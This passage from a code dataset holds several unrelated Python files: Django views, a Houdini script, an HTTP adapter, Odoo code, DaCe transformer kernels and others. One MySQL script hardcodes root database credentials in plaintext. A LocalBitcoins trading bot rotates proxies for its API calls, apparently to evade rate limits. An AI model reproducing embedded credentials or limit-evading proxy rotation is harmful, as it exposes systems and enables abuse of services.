= self.request.GET['id']\n user = User.objects.get(username=self.request.user.username)\n if content_type_model:\n task = Task.objects.filter(id=id).first()\n if task is None or task.contest.public == False:\n return None\n if content_type_model == 'translation':\n translation = Translation.objects.filter(user=user, task=task).first()\n if translation is None or translation.user != user:\n return None\n return \"%s-%s-%s.%s\" % (\n task.name, translation.user.language, translation.get_latest_change_time(), self.get_file_format())\n elif content_type_model == 'task':\n return \"%s-%s-%s.%s\" % (task.name, \"ISC\", task.get_latest_change_time(), self.get_file_format())\n else:\n return None\n\n content_version = ContentVersion.objects.filter(id=id).first()\n if not content_version.can_view_by(user):\n return None\n if content_version.content_type.model == \"translation\":\n return \"%s-%s-%s.%s\" % (\n content_version.content_object.task.name, content_version.content_object.user.language,\n content_version.content_object.get_latest_change_time(), self.get_file_format())\n else:\n return \"%s-%s-%s.%s\" % (\n content_version.content_object.title, \"ISC\", content_version.content_object.get_latest_change_time(),\n self.get_file_format())\n\n\nclass GetVersionPDF(VersionDownloadMixin, LoginRequiredMixin, PDFTemplateView):\n file_format = 'pdf'\n template_name = 'pdf-template.html'\n cmd_options = {\n 'page-size': 'A4',\n 'margin-top': '0.75in',\n 'margin-right': '0.75in',\n 'margin-bottom': '0.75in',\n 'margin-left': '0.75in',\n # 'zoom': 15,\n 'javascript-delay': 500,\n }\n\n def get_context_data(self, **kwargs):\n context = super(GetVersionPDF, self).get_context_data(**kwargs)\n # version = self.get_version()\n #\n # content = version.text\n content = self.get_version_text()\n context['direction'] = 'ltr'\n context['content'] = content\n context['title'] = self.get_filename()\n return context\n\n\nclass GetVersionMarkDown(VersionDownloadMixin, LoginRequiredMixin, View):\n file_format = 'md'\n\n def get(self, request, *args, **kwargs):\n # version = self.get_version()\n # user = User.objects.get(username=self.request.user.username)\n # if version.can_view_by(user) == False:\n # HttpResponseForbidden()\n\n content = self.get_version_text()\n response = HttpResponse(content, content_type='text/plain; charset=UTF-8')\n return response\n","sub_path":"trans/views/version.py","file_name":"version.py","file_ext":"py","file_size_in_byte":4857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"210365544","text":"# -*- coding: utf-8 -*-\n\nimport re,os,hou\ndef main():\n reg = re.compile(\"v[0-9]{1,3}\")\n parmlist = [\"vm_picture\",\"file\",\"sopoutput\",\"filename1\",\"RS_outputFileNamePrefix\"]\n nodes = hou.selectedNodes()\n if nodes is not None:\n for nd in nodes:\n ndpath = nd.path()\n for parm in nd.parms():\n if parm.name() in parmlist:\n code = parm.asCode()\n val = code.split('hou_parm.set(\"')[1].split('\")')[0]\n vlst = re.findall(\"v[0-9]{1,3}\",val)\n if vlst is not None:\n new_vlst = []\n for v in vlst:\n num = int(v[1:])\n pad = \"%s0%dd\" % (\"v%\",len(v[1:]))\n nv = pad % (num+1)\n new_vlst.append(nv)\n tmp1 = re.split(\"v[0-9]{1,3}\",val)\n i = 1\n for v in new_vlst:\n tmp1.insert(i,v)\n i = i+2\n val = \"\".join(tmp1)\n parm.set(val)\n\nif __name__ =='__main__':\n main()","sub_path":"python2.7libs/_backup/auto_path_up_version.py","file_name":"auto_path_up_version.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"43499312","text":"from datetime import date\nfrom django import forms\n\n\nclass DateForm(forms.Form):\n date = forms.DateField(initial=date.today, label='Fecha')\n\n @classmethod\n def get_default_form(cls):\n d = {\n 'date': cls.base_fields['date'].initial()\n }\n\n f = cls(d)\n assert f.is_valid()\n return f\n","sub_path":"tracker/forms/date_form.py","file_name":"date_form.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"364262451","text":"from 基础知识.数据库存储.Mysql import pymysql_util\nimport pymysql\nfrom 基础知识.文档操作.excel import excel_util\n\n\ndef get_db():\n # 打开数据库连接\n db = pymysql.connect(\n host=\"123.206.227.74\", user=\"root\",\n password=\"exue2017\", db=\"sit_exue_resource\", port=3306,\n charset=\"utf8\"\n )\n return db\n\n\n# 查询某个学科信息\n# ('语文', '9', '语文北师版九上', '第二单元', '口技', 'edition_id', 'chapter_id')\ndef book_sql(subject_name):\n sql = \"SELECT b.subject_name,gb.grade,b.book_name,u.unit_name,c.chapter_name,b.edition_id,c.chapter_id \"\n sql += \"from t_res_chapter c \"\n sql += \"LEFT JOIN t_res_units u on c.unit_id = u.unit_id \"\n sql += \"LEFT JOIN t_res_book b on c.book_id = b.book_id \"\n sql += \"LEFT JOIN t_res_graduate_book gb on c.book_id = gb.book_id \"\n sql += \"WHERE b.subject_name = '%s'\"\n return sql % subject_name\n\n\n# 查询二月份之后录入题目数量\ndef sql_count_new(subject_key):\n sql = \"SELECT qc.chapter_id,count(qc.question_uuid) from t_res_%s_question_chapter qc LEFT JOIN t_res_%s_question q \"\n sql += \"on qc.question_uuid = q.uuid where type in ('2','11') \"\n sql += \"and q.create_time > '2018-02-01 00:00:00' GROUP BY qc.chapter_id\"\n return sql % (subject_key, subject_key)\n\n\n# 查询二月份之前录入题目数量\ndef sql_count_old(subject_key):\n sql = \"SELECT qc.chapter_id,count(qc.question_uuid) from t_res_%s_question_chapter qc LEFT JOIN t_res_%s_question q \"\n sql += \"on qc.question_uuid = q.uuid where type in ('2','11') \"\n sql += \"and q.create_time < '2018-02-01 00:00:00' GROUP BY qc.chapter_id\"\n return sql % (subject_key, subject_key)\n\n\ndef main(subject_key, subject_name):\n result_new = pymysql_util.find_all(db, sql_count_new(subject_key)) # '章节id','数量'\n result_old = pymysql_util.find_all(db, sql_count_old(subject_key))\n\n editor_sql = \"SELECT edition_id,CONCAT(press_name,edition_name) from t_res_editor\"\n editors = pymysql_util.find_all(db, editor_sql)\n\n result_book = pymysql_util.find_all(db, book_sql(subject_name))\n # ('语文', '9', '语文北师版九上', '第二单元', '口技', 'edition_id', 'chapter_id')\n result_data = [[\"学科\", \"年级\", \"课本\", \"单元\", \"章节\", \"教材\", \"学乐数量\", \"二月新增数量\"]]\n for book in result_book:\n li = [book[0], book[1], book[2], book[3], book[4], 0, 0, 0]\n for editor in editors: # 教材\n if editor[0] == book[5]:\n li[5] = editor[1]\n for result in result_old: # 学乐云数量\n if book[6] == result[0]:\n li[6] = result[1]\n for result in result_new: # 二月新增数量\n if book[6] == result[0]:\n li[7] = result[1]\n result_data.append(li)\n excel_util.create_excel(result_data, \"%s(单选判断)统计.xlsx\" % subject_name)\n\n\nif __name__ == '__main__':\n db = get_db()\n sub_key = [\"yw\", \"sx\", \"yy\", \"dl\", \"hx\", \"ls\", \"wl\", \"zz\", \"sw\", 'kx', \"sp\", \"dd\", \"ty\", \"ms\", \"mu\"]\n sub_name = [\"语文\", \"数学\", \"英语\", \"地理\", \"化学\", \"历史\", \"物理\", \"政治\", \"生物\", \"科学\", \"思想品德\", \"道德与法治\", \"体育\", \"美术\", \"音乐\"]\n for i in range(len(sub_key)):\n main(sub_key[i], sub_name[i])\n","sub_path":"工作/题目查询/select.py","file_name":"select.py","file_ext":"py","file_size_in_byte":3310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"57603936","text":"# class CocaCola:\n# \tit_taste = 'So good!'\n#\n#\n# coke_for_bum = CocaCola()\n# coke_for_president = CocaCola()\n# print(coke_for_bum.it_taste)\n# print(coke_for_president.it_taste)\n\n# 定义一个类\n# 在类里面赋值的变量就是类的变量,类的变量有一个专有的术语,叫做类的属性\n\n\n# class CocaCola:\n# \tformula = ['caffeine', 'sugar', 'water', 'soda']\n#\n# \t# 构造函数,实例化类的时候会默认执行这个方法\n# \t# 可以接受参数,不需要调用方法,在实例化的时候在括号里面加上参数即可\n# \tdef __int__(self, logo_name='可口可乐'):\n# \t\tself.local_logo = logo_name\n#\n# \t# 实例方法\n# \t# 被实例化的对象会传入后面方法的括号中\n# \tdef drink(self, how_much):\n# \t\tif how_much == 'a sip':\n# \t\t\tprint('Cool~')\n# \t\telif how_much == 'whole bottle':\n# \t\t\tprint('Headache!')\n#\n#\n# # 类的实例化\n# coke_for_me = CocaCola()\n# coke_for_you = CocaCola()\n# coke_for_China = CocaCola()\n# # 在创建类之后为新实例化的对象添加的属性就是实例属性\n# coke_for_China.local_logo = '可口可乐'\n#\n# coke = CocaCola()\n# # coke.drink()\n# ice_coke = CocaCola()\n# ice_coke.drink('a sip')\n#\n#\n# # 类属性的引用\n# # 在类的名字后面输入.加上属性的名称,这就是类属性的引用\n\n\n# 类的继承\n\nclass CocaCola:\n\tcalories = 140\n\tsodium = 45\n\ttotal_carb = 39\n\tcaffeine = 34\n\tingredients = [\n\t\t'High Fructose Corn Syrup',\n\t\t'Carbonated Water',\n\t\t'Phosphoric Acid',\n\t\t'Natural Flavors',\n\t\t'Caramel Color',\n\t\t'Caffeine',\n\t]\n\n\tdef __int__(self, logo_name):\n\t\tself.local_logo = logo_name\n\n\tdef drink(self):\n\t\tprint('You got {} cal energy!'.format(self.calories))\n\n\n# 在新的类后面的括号中放入CocaCola,这就表示这个类是继承与CocaCola这个父类的\n# 类中的变量和方法可以完全被子类继承,如有需要特殊的改动也可以进行覆盖\nclass CaffeineFree(CocaCola):\n\tcaffeine = 0\n\tingredients = [\n\t\t'High Fructose Corn Syrup',\n\t\t'Carbonated Water',\n\t\t'Phosphoric Acid',\n\t\t'Natural Flavors',\n\t\t'Caramel Color',\n\t]\n\n\ncoke_a = CaffeineFree('Cocacola-FREE')\ncoke_a.drink()\n\n\n\n\n\n\n","sub_path":"Class/Class.py","file_name":"Class.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"16691602","text":"import asyncio\nimport io\nimport os\nimport ssl\nimport typing\nfrom http.client import _encode\nfrom urllib.parse import urlparse\n\nimport h11\nimport requests\nimport urllib3\n\nfrom .connections import ConnectionManager\n\n\nclass HTTPAdapter:\n def __init__(self):\n self.manager = ConnectionManager()\n\n async def send(\n self, request, stream=False, timeout=None, verify=True, cert=None, proxies=None\n ) -> requests.Response:\n urlparts = urlparse(request.url)\n\n if isinstance(timeout, tuple):\n connect_timeout, read_timeout = timeout\n else:\n connect_timeout = timeout\n read_timeout = timeout\n\n connection = await self.manager.get_connection(\n url=urlparts, verify=verify, cert=cert, timeout=connect_timeout\n )\n\n target = urlparts.path\n if urlparts.query:\n target += \"?\" + urlparts.query\n headers = [(\"host\", urlparts.netloc)] + list(request.headers.items())\n\n message = h11.Request(method=request.method, target=target, headers=headers)\n await connection.send_event(message)\n\n if request.body:\n body = (\n _encode(request.body) if isinstance(request.body, str) else request.body\n )\n message = h11.Data(data=body)\n await connection.send_event(message)\n\n message = h11.EndOfMessage()\n await connection.send_event(message)\n\n status_code = 0\n headers = []\n reason = b\"\"\n buffer = io.BytesIO()\n\n while True:\n event = await connection.receive_event(read_timeout)\n event_type = type(event)\n\n if event_type is h11.Response:\n status_code = event.status_code\n headers = [\n (key.decode(), value.decode()) for key, value in event.headers\n ]\n reason = event.reason\n\n elif event_type is h11.Data:\n buffer.write(event.data)\n\n elif event_type is h11.EndOfMessage:\n buffer.seek(0)\n break\n\n await connection.close()\n\n resp = urllib3.HTTPResponse(\n body=buffer,\n headers=headers,\n status=status_code,\n reason=reason,\n preload_content=False,\n )\n\n return self.build_response(request, resp)\n\n async def close(self):\n pass\n\n def build_response(self, req, resp):\n \"\"\"Builds a :class:`Response ` object from a urllib3\n response. This should not be called from user code, and is only exposed\n for use when subclassing the\n :class:`HTTPAdapter `\n :param req: The :class:`PreparedRequest ` used to generate the response.\n :param resp: The urllib3 response object.\n :rtype: requests.Response\n \"\"\"\n response = requests.models.Response()\n\n # Fallback to None if there's no status_code, for whatever reason.\n response.status_code = getattr(resp, \"status\", None)\n\n # Make headers case-insensitive.\n response.headers = requests.structures.CaseInsensitiveDict(\n getattr(resp, \"headers\", {})\n )\n\n # Set encoding.\n response.encoding = requests.utils.get_encoding_from_headers(response.headers)\n response.raw = resp\n response.reason = response.raw.reason\n\n if isinstance(req.url, bytes):\n response.url = req.url.decode(\"utf-8\")\n else:\n response.url = req.url\n\n # Add new cookies from the server.\n requests.cookies.extract_cookies_to_jar(response.cookies, req, resp)\n\n # Give the Response some context.\n response.request = req\n response.connection = self\n\n return response\n","sub_path":"requests_async/adapters.py","file_name":"adapters.py","file_ext":"py","file_size_in_byte":3842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"105066294","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# Copyright (C) 2014 Eficent ()\n# \n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n##############################################################################\nfrom openerp.osv import orm, fields\n\n\nclass procurement_order(orm.Model):\n _inherit = \"procurement.order\"\n\n def make_po(self, cr, uid, ids, context=None):\n res = super(procurement_order, self).make_po(cr, uid, ids,\n context=context)\n requisition_line_obj = self.pool.get('purchase.requisition.line')\n for procurement in self.browse(cr, uid, ids, context=context):\n if procurement.analytic_account_id and procurement.requisition_id:\n for line_id in procurement.requisition_id.line_ids:\n requisition_line_obj.write(\n cr, uid, [line_id.id], {\n 'account_analytic_id':\n procurement.analytic_account_id.id})\n\n return res","sub_path":"purchase_requisition_procurement_analytic/model/procurement.py","file_name":"procurement.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"34775951","text":"import yaml\nimport os\nimport Get_Trello_MoodleEPN_Keys\n\n\ndef load_config_file(config_file):\n while(True):\n try:\n with open(get_file_location(config_file), 'r') as config_yaml:\n file_config = yaml.safe_load(config_yaml)\n return file_config\n except IOError:\n print(\"Archivo de configuración no encontrado, generando llaves\")\n Get_Trello_MoodleEPN_Keys.onboard(False)\n\n\ndef get_file_location(filename):\n workingDirectory = os.path.dirname(os.path.realpath(__file__))\n return os.path.join(workingDirectory, filename)\n","sub_path":"configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"227121936","text":"from __future__ import unicode_literals\nimport requests\nimport requests.auth\nfrom datetime import datetime\nimport time\nimport api\nfrom config import *\nfrom API_keys import *\n\nurl = buy_list + '.json'\nMe_1 = BuyURL\nMe_id_1 = Me_1.split('/')[-2]\nMe_3_1 = str(\"/api/ad-equation/\" + Me_id_1 + \"/\")\nurl2 = 'https://httpbin.org/ip'\n\n\ndef loadqiwi(session, nam=None):\n \n ''' API запрос'''\n \n global t, a\n if nam is None:\n t = session.get(url).json()['data']['ad_list']\n else:\n session.proxies = {'https': proxy_logpas + nam}\n t = session.get(url).json()['data']['ad_list']\n return t\n\n\ndef info(req, High=None):\n \n '''Определение max цены'''\n \n lst = []\n for trader in range(len(req)):\n visible = req[trader]['data']['visible']\n price = float(req[trader]['data']['temp_price'])\n username = req[trader]['data']['profile']['username']\n if visible is False or price > High or any(word in username for word in list_ignore):\n pass\n else:\n lst.append(price)\n params = {u'price_equation': str(round(float(max(lst) + X), 2))}\n return params\n\n\n\ndef torg_loc(params, nam=None):\n \n '''API изменения цены'''\n \n if nam is None:\n nowtime = datetime.now().strftime('%H:%M:%S.%f')\n a = api.hmac(hmac_key, hmac_secret).call('POST', Me_3_1, params).json()\n print(\"-------------------------------------------------------\", )\n print(str(a) + nowtime + \" Новая цена : \" + str(params.get('price_equation')) + '\\t')\n else:\n nowtime = datetime.now().strftime('%H:%M:%S.%f')\n a = api.hmac(hmac_key, hmac_secret, proxy = {'https': proxy_logpas + nam}).call('POST', Me_3_1, params).json()\n print(\"-------------------------------------------------------\", )\n print(str(a) + nowtime + \" Новая цена : \" + str(params.get('price_equation')) + '\\t' + nam)\n\n\n\ndef bay():\n\n '''Отправка первого сообщения'''\n \n conn = api.hmac(hmac_key, hmac_secret)\n n = None\n while True:\n try:\n n = conn.call('GET', '/api/notifications/').json()['data']\n except Exception as e:\n print(e)\n\n for i, e in reversed(list(enumerate(n))):\n\n if e['read'] == False:\n s = e['msg'] # тело сообщения\n d = str(e['id']) # id сообщения\n d1 = str('/api/notifications/mark_as_read/' + d + '/') # api ключ\n k = str(e['contact_id']) # id сделки\n k1 = str('/api/contact_message_post/' + k + '/')\n\n if 'Вы получили новое предложение' in s:\n print('есть сообщение!')\n print('начинаем процесс отправки реквезитов!!!')\n conn.call('POST', k1, Msg1.encode('utf-8')).json()\n conn.call('POST', d1).json()\n print('\\t реквезиты отправлены.\\n')\n continue\n time.sleep(10)\n\n\n\ndef main():\n requests_proxi = []\n api_proxy = []\n index_proxy = 0\n\n ''' Список проксей'''\n \n with open('12.txt') as f:\n for index, line in enumerate(f):\n if index < 6:\n requests_proxi.append(line.replace('*******', '').strip())\n else:\n api_proxy.append(line.replace('********', '').strip())\n\n with requests.Session() as session:\n while True:\n \n try:\n \n ''' Tекущая цена BTC'''\n \n high = float(session.get('https://api.coindesk.com/v1/bpi/currentprice.json').json()['bpi']['USD']['rate'].replace(',','').split('.')[0]) * kurs * 0.99\n except Exception as e:\n print(e)\n\n ''' Основной цекл скрипта'''\n \n for i in requests_proxi:\n try:\n a = loadqiwi(session, nam=i)\n torg_loc(info(a, High=high), nam=api_proxy[index_proxy])\n except Exception as e:\n print(e)\n \n index_proxy +=1\n if index_proxy > len(api_proxy) - 1:\n index_proxy = 0\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"293964492","text":"#Given a string s, remove duplicate letters so that every letter appears once and only once. You must make sure your result is the smallest in lexicographical order among all possible results.\n\n#Note: This question is the same as 1081: https://leetcode.com/problems/smallest-subsequence-of-distinct-characters/\n\n\n\n#Example 1:\n\n#Input: s = \"bcabc\"\n#Output: \"abc\"\n#Example 2:\n\n#Input: s = \"cbacdcbc\"\n#Output: \"acdb\"\n\n\n#Constraints:\n\n#1 <= s.length <= 104\n#s consists of lowercase English letters.\n\nclass Solution:\n def removeDuplicateLetters(self, s: str) -> str:\n count = [0] * 26\n for i in range(len(s)):\n count[ord(s[i]) - ord('a')] += 1\n stack = []\n present = {}\n for i in range(len(s)):\n count[ord(s[i]) - ord('a')] -= 1\n\n if s[i] in present: continue\n\n while stack and ord(stack[-1]) > ord(s[i]) and count[ord(stack[-1])-ord('a')]:\n del present[stack[-1]]\n stack.pop()\n stack.append(s[i])\n present[s[i]] = True\n return \"\".join(stack)\na = Solution()\ns = \"cbacdcbc\"\na.removeDuplicateLetters(s)\n\n","sub_path":"python_code/316_Remove_Duplicate_Letters.py","file_name":"316_Remove_Duplicate_Letters.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"600713337","text":"import dace\nimport numpy as np\nimport math\nimport os\n\n# Imported to register transformation\nfrom substation.xforms.merge_source_sink import MergeSourceSinkArrays\n\nfrom substation.attention import attn_forward_sdfg\nfrom substation.dtypes import *\n\nB, H, N, P, SM, SN = (dace.symbol(s) for s in ['B', 'H', 'N', 'P', 'SM', 'SN'])\nemb = dace.symbol('emb')\neps = 1e-5\n\n\n@dace.program\ndef gelu(x: dace_dtype[B, SM, N]):\n \"\"\"Gaussian Error Linear Unit applied to x.\"\"\"\n out = np.ndarray(x.shape, x.dtype)\n for i, j, k in dace.map[0:B, 0:SM, 0:N]:\n with dace.tasklet:\n inp << x[i, j, k]\n outp >> out[i, j, k]\n outp = 0.5 * inp * (1 + math.tanh(\n math.sqrt(2.0 / math.pi) * (inp + 0.044715 * (inp**3))))\n return out\n\n\n@dace.program\ndef linear(x: dace_dtype[B, SM, N], w: dace_dtype[emb, N]):\n \"\"\"Fully-connected layer with weights w applied to x, and optional bias b.\n\n x is of shape (batch, *).\n w is of shape (num_inputs, num_outputs).\n\n \"\"\"\n return x @ np.transpose(w)\n\n\n@dace.program\ndef linear_with_bias(x: dace_dtype[B, SM, N], w: dace_dtype[emb, N],\n bias: dace_dtype[emb]):\n \"\"\"Fully-connected layer with weights w and bias.\"\"\"\n out = np.ndarray([B, SM, emb], x.dtype)\n outb = np.ndarray([B, SM, emb], x.dtype)\n for i in dace.map[0:B]:\n out[i] = x[i] @ np.transpose(w[:])\n for i, j, k in dace.map[0:B, 0:SM, 0:emb]:\n with dace.tasklet:\n inp << out[i, j, k]\n b << bias[k]\n outp >> outb[i, j, k]\n outp = inp + b\n return outb\n\n\n@dace.program\ndef meanstd(x: dace_dtype[B, SM, N]):\n mean = np.ndarray([B, SM], x.dtype)\n std = np.ndarray([B, SM], x.dtype)\n\n moment = dace.reduce(lambda a, b: a + b, x, axis=2, identity=0)\n second_moment = dace.reduce(lambda a, b: a + b * b, x, axis=2, identity=0)\n\n for i, j in dace.map[0:B, 0:SM]:\n with dace.tasklet:\n fmom << moment[i, j]\n mn >> mean[i, j]\n mn = fmom / (SM * B)\n with dace.tasklet:\n fmom << moment[i, j]\n smom << second_moment[i, j]\n st >> std[i, j]\n st = (smom - (fmom * fmom)) / (SM * B)\n\n return mean, std\n\n\n@dace.program\ndef layer_norm(x: dace_dtype[B, SM, N]):\n \"\"\" Apply layer normalization to x. \"\"\"\n out = np.ndarray(x.shape, x.dtype)\n mean, std = meanstd(x)\n for i, j, k in dace.map[0:B, 0:SM, 0:N]:\n with dace.tasklet:\n in_x << x[i, j, k]\n in_m << mean[i, j]\n in_s << std[i, j]\n o >> out[i, j, k]\n o = (in_x - in_m) / (in_s + eps)\n return out\n\n\n@dace.program\ndef layer_norm_scaled(x: dace_dtype[B, SM, N], scale: dace_dtype[N],\n bias: dace_dtype[N]):\n \"\"\"Apply layer normalization to x, with scale and bias.\n\n scale and bias are the same shape as the final axis.\n\n \"\"\"\n out = np.ndarray(x.shape, x.dtype)\n mean, std = meanstd(x)\n for i, j, k in dace.map[0:SM, 0:B, 0:N]:\n with dace.tasklet:\n in_scal << scale[k]\n in_bias << bias[k]\n in_x << x[i, j, k]\n in_m << mean[i, j]\n in_s << std[i, j]\n o >> out[i, j, k]\n o = in_scal * ((in_x - in_m) / (in_s + eps)) + in_bias\n return out\n\n\n@dace.program\ndef dropout(x: dace_dtype[B, SM, N], mask: dace_dtype[B, SM, N]):\n \"\"\"Apply dropout with pre-randomized dropout mask.\"\"\"\n return x * mask\n\n\n@dace.program\ndef softmax(X_in: dace_dtype[H, B, SN, SM]):\n tmp_max = dace.reduce(lambda a, b: max(a, b), X_in, axis=3)\n tmp_out = np.ndarray([H, B, SN, SM], dtype=dace_dtype)\n out = np.ndarray([H, B, SN, SM], dtype=dace_dtype)\n\n # No broadcasting rules\n for i, j, k, l in dace.map[0:H, 0:B, 0:SN, 0:SM]:\n with dace.tasklet:\n inp << X_in[i, j, k, l]\n mx << tmp_max[i, j, k]\n o >> tmp_out[i, j, k, l]\n o = math.exp(inp - mx)\n #tmp_out = np.exp(X_in - tmp_max)\n\n tmp_sum = dace.reduce(lambda a, b: a + b, tmp_out, identity=0, axis=3)\n for i, j, k, l in dace.map[0:H, 0:B, 0:SN, 0:SM]:\n with dace.tasklet:\n inp << tmp_out[i, j, k, l]\n sm << tmp_sum[i, j, k]\n o >> out[i, j, k, l]\n o = inp / sm\n\n return out\n\n\n@dace.program\ndef mha_forward(q: dace_dtype[B, SN, N], k: dace_dtype[B, SM, N],\n v: dace_dtype[B, SM, N], wq: dace_dtype[P, H, N],\n wk: dace_dtype[P, H, N], wv: dace_dtype[P, H, N],\n wo: dace_dtype[P, H, N], scaler: dace_dtype):\n qq = np.einsum(\"phi,bji->phbj\", wq, q)\n kk = np.einsum(\"phi,bki->phbk\", wk, k)\n vv = np.einsum(\"phi,bki->phbk\", wv, v)\n beta = scaler * np.einsum(\"phbk,phbj->hbjk\", kk, qq)\n alpha = softmax(beta)\n gamma = np.einsum(\"phbk,hbjk->phbj\", vv, alpha)\n out = np.einsum(\"phi,phbj->bji\", wo, gamma)\n return out\n\n\n\n@dace.program\ndef encoder(x: dace_dtype[B, SM,\n N], attn_wq: dace_dtype[P, H,\n N], attn_wk: dace_dtype[P, H,\n N],\n attn_wv: dace_dtype[P, H, N], attn_wo: dace_dtype[P, H, N],\n attn_scale: dace_dtype, norm1_scale: dace_dtype[N],\n norm1_bias: dace_dtype[N], norm2_scale: dace_dtype[N],\n norm2_bias: dace_dtype[N], linear1_w: dace_dtype[emb, N],\n linear1_b: dace_dtype[emb], linear2_w: dace_dtype[N, emb],\n linear2_b: dace_dtype[N], attn_dropout: dace_dtype[B, SM, N],\n linear1_dropout: dace_dtype[B, SM,\n emb], ff_dropout: dace_dtype[B, SM,\n N]):\n\n # Self-attention.\n # attn = np.ndarray(x.shape, x.dtype)\n # attn_forward(Q=x,\n # K=x,\n # V=x,\n # WQ=attn_wq,\n # WK=attn_wk,\n # WV=attn_wv,\n # WO=attn_wo,\n # scaler=attn_scale,\n # OUT=attn,\n # B=B,\n # H=H,\n # N=N,\n # P=P,\n # SM=SM,\n # SN=SM)\n attn = mha_forward(x, x, x, attn_wq, attn_wk, attn_wv, attn_wo, attn_scale)\n\n # Residual connection.\n attn_resid = dropout(attn, attn_dropout) + x # B x SM x N\n\n normed1 = layer_norm_scaled(attn_resid, norm1_scale,\n norm1_bias) # B x SM x N\n\n # Feedforward network.\n ff = linear_with_bias(\n dropout(\n gelu(linear_with_bias(normed1, linear1_w,\n linear1_b)), # B x SM x emb\n linear1_dropout),\n linear2_w,\n linear2_b) # B x SM x N\n\n # Residual connection.\n ff_resid = dropout(ff, ff_dropout) + normed1 # B x SM x N\n normed2 = layer_norm_scaled(ff_resid, norm2_scale,\n norm2_bias) # B x SM x N\n return normed2\n\n\n@dace.program\ndef decoder(x: dace_dtype[B, SM, N], attn_wq: dace_dtype[P, H, N],\n attn_wk: dace_dtype[P, H, N], attn_wv: dace_dtype[P, H, N],\n attn_wo: dace_dtype[P, H, N], attn_scale: dace_dtype,\n attn_mask: dace_dtype[SM, SM], norm1_scale: dace_dtype[N],\n norm1_bias: dace_dtype[N], norm2_scale: dace_dtype[N],\n norm2_bias: dace_dtype[N], linear1_w: dace_dtype[emb, N],\n linear1_b: dace_dtype[emb], linear2_w: dace_dtype[N, emb],\n linear2_b: dace_dtype[N], attn_dropout: dace_dtype[B, SM, N],\n linear1_dropout: dace_dtype[B, SM,\n emb], ff_dropout: dace_dtype[B, SM,\n N]):\n # Masked self-attention.\n attn = np.ndarray(x.shape, x.dtype)\n attn_forward_mask(Q=x,\n K=x,\n V=x,\n WQ=attn_wq,\n WK=attn_wk,\n WV=attn_wv,\n WO=attn_wo,\n scaler=attn_scale,\n OUT=attn,\n MASK=attn_mask,\n B=B,\n H=H,\n N=N,\n P=P,\n SM=SM,\n SN=SM)\n\n # Residual connection.\n attn_resid = dropout(attn, attn_dropout) + x\n normed1 = layer_norm(attn_resid, norm1_scale, norm1_bias)\n # Feedforward network.\n ff = linear_with_bias(\n dropout(gelu(linear_with_bias(normed1, linear1_w, linear1_b)),\n linear1_dropout), linear2_w, linear2_b)\n # Residual connection.\n ff_resid = dropout(ff, ff_dropout) + normed1\n normed2 = layer_norm(ff_resid, norm2_scale, norm2_bias)\n return normed2\n\n\n@dace.program\ndef dec_with_enc_attn(\n x: dace_dtype[B, SN, N], encoder_out: dace_dtype[B, SM, N],\n sattn_wq: dace_dtype[P, H, N], sattn_wk: dace_dtype[P, H, N],\n sattn_wv: dace_dtype[P, H,\n N], sattn_wo: dace_dtype[P, H,\n N], sattn_scale: dace_dtype,\n sattn_mask: dace_dtype[SN, SN], edattn_wq: dace_dtype[P, H, N],\n edattn_wk: dace_dtype[P, H, N], edattn_wv: dace_dtype[P, H, N],\n edattn_wo: dace_dtype[P, H, N], edattn_scale: dace_dtype,\n norm1_scale: dace_dtype[N], norm1_bias: dace_dtype[N],\n norm2_scale: dace_dtype[N], norm2_bias: dace_dtype[N],\n norm3_scale: dace_dtype[N], norm3_bias: dace_dtype[N],\n linear1_w: dace_dtype[emb, N], linear1_b: dace_dtype[emb],\n linear2_w: dace_dtype[N, emb], linear2_b: dace_dtype[N],\n sattn_dropout: dace_dtype[B, SN, N], edattn_dropout: dace_dtype[B, SN, N],\n linear1_dropout: dace_dtype[B, SN, emb], ff_dropout: dace_dtype[B, SN, N]):\n # Masked self-attention.\n sattn = np.ndarray(x.shape, x.dtype)\n attn_forward_mask(Q=x,\n K=x,\n V=x,\n WQ=sattn_wq,\n WK=sattn_wk,\n WV=sattn_wv,\n WO=sattn_wo,\n scaler=sattn_scale,\n OUT=sattn,\n MASK=sattn_mask,\n B=B,\n H=H,\n N=N,\n P=P,\n SM=SN,\n SN=SN)\n # Residual connection.\n sattn_resid = dropout(sattn, sattn_dropout) + x\n normed1 = layer_norm(sattn_resid, norm1_scale, norm1_bias)\n\n # Encoder-decoder attention.\n edattn = np.ndarray(normed1.shape, dace.float32)\n attn_forward(Q=normed1,\n K=encoder_out,\n V=encoder_out,\n WQ=edattn_wq,\n WK=edattn_wk,\n WV=edattn_wv,\n WO=edattn_wo,\n scaler=edattn_scale,\n OUT=edattn,\n B=B,\n H=H,\n N=N,\n P=P,\n 